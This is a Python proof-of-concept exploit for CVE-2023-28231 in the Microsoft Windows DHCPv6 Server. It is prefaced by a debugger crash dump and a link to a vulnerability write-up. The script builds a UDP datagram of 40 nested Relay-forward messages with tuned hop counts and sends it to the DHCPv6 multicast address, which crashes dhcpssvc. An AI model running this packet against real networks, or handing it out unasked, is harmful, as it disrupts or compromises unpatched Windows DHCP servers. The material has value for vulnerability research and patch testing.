"""
Microsoft DHCPv6 Server - RelayForward
@w3bd3vil
0:024> r
rax=00000000ffff000c rbx=00000000000001a2 rcx=00000033ffcc0270
rdx=0000000000000000 rsi=00000000000001a2 rdi=00000138fba4c098
rip=00007ffa177aecc6 rsp=0000003179dffd00 rbp=0000000000000012
r8=0000000000000020 r9=0000000000000000 r10=0000000000000004
r11=0000000000000246 r12=000000000000059c r13=0000000000000002
r14=00000138fba4d48c r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
dhcpssvc!ProcessRelayForwardMessage+0x346:
00007ffa`177aecc6 4c398c396a060000 cmp qword ptr [rcx+rdi+66Ah],r9 ds:0000016c`fb70c972=????????????????
0:024> k
# Child-SP RetAddr Call Site
00 00000031`79dffd00 00007ffa`177ae4a3 dhcpssvc!ProcessRelayForwardMessage+0x346
01 00000031`79dffda0 00007ffa`177b16e7 dhcpssvc!DhcpV6ProcessMessage+0x187
02 00000031`79dffe00 00007ffa`1779cbd5 dhcpssvc!DhcpV6ProcessPacket+0x77
03 00000031`79dffe50 00007ffa`24c94de0 dhcpssvc!ProcessingLoop+0x1c5
04 00000031`79dffeb0 00007ffa`25cfe3db KERNEL32!BaseThreadInitThunk+0x10
05 00000031`79dffee0 00000000`00000000 ntdll!RtlUserThreadStart+0x2b
https://www.zerodayinitiative.com/blog/2023/5/1/cve-2023-28231-rce-in-the-microsoft-windows-dhcpv6-service
"""
import socket
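# Builds one DHCPv6 Relay-forward message that wraps 40 further Relay-forward
# messages inside each other (Relay Message option 0x0009); the innermost level
# carries a SOLICIT. The whole thing is sent as a single UDP datagram.
#
# Only the source address (LHOST) is hard-coded; the destination is the
# DHCPv6 All_DHCP_Relay_Agents_and_Servers multicast on the server port.
# The socket is a context manager so it is closed even if bind/sendto raises.
with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:
    s.bind(('2001:db8::f0c0:c671:3b26:e213', 547)) #LHOST
    dest_addr = ('ff02::1:2', 547)

    # Outermost header: msg-type, hop-count, link-address, peer-address.
    final_packet = b'\x0c' #Relay-forw
    # dhcpssvc!ProcessRelayForwardMessage+0x103:
    # 00007ffa`177aea83 807d0120 cmp byte ptr [rbp+1],20h ss:00000138`fba49ef1=21
    final_packet += b'\x20'
    final_packet += b'\x00'*16 #link-address
    final_packet += b'\x00'*16 #peer-address

    # Nested levels are built innermost-first (i == 0) and reversed on join,
    # so the running length_value is the option length of the level being built.
    arre_packet = []
    length_value = 0
    for i in range(40):
        if i == 0:
            # 40 bytes of Relay-forw header (1 msg-type + 1 hop + 16 + 16 + 6-byte
            # interface-id option) + 4-byte inner Relay Message option header
            # + the 56-byte SOLICIT payload.
            length_value += 40 + 4 + 56
        else:
            # Each further level adds only its own header and option header.
            length_value += 40 + 4
        hex_length_value = length_value.to_bytes(2, 'big')

        # dhcpssvc!ProcessRelayForwardMessage+0x268:
        # 00007ffa`177aebe8 0f859c010000 jne dhcpssvc!ProcessRelayForwardMessage+0x40a (00007ffa`177aed8a) [br=0]
        # Hop count is 0 for the innermost nine levels and then counts up.
        hop_count = 0 if i <= 8 else i - 8
        hop_byte = hop_count.to_bytes(1, 'big')

        packet = b''
        packet += b'\x00\x09' #Relay Message
        packet += hex_length_value
        packet += b'\x0c' #Relay-forw
        packet += hop_byte
        packet += b'\xff'*16 #link-address
        packet += b'\xff'*16 #peer-address
        packet += b'\x00\x12\x00\x02\x51\x80' #interface-id (probably not required)
        if i == 0:
            # Innermost level: Relay Message option whose payload is a 0x38-byte SOLICIT.
            packet += b'\x00\x09' #Relay Message
            packet += b'\x00\x38' #Length
            packet += b'\x01\x91\xf7\xd9\x00\x01\x00\x0e\x00\x01\x00\x01\x2b\xe6\xb0\xc7\x56\x1f\xf0\x8f\x03\x85\x00\x06\x00' #SOLICIT
            packet += b'\x08\x00\x17\x00\x18\x00\x27\x00\x1f\x00\x08\x00\x02\x00\x00\x00\x03\x00\x0c\x5d\x0b\xdd\x07\x00\x00' #SOLICIT
            packet += b'\x0e\x10\x00\x00\x15\x18' #SOLICIT
        #print(packet.hex())
        arre_packet.append(packet)

    #print(b''.join(arre_packet[::-1]).hex())
    # Reverse so the outermost level (largest length) comes first.
    final_packet += b''.join(arre_packet[::-1])
    s.sendto(final_packet, dest_addr)
    # Plain string: the original used an f-string with no placeholders.
    print("Krash packet sent!")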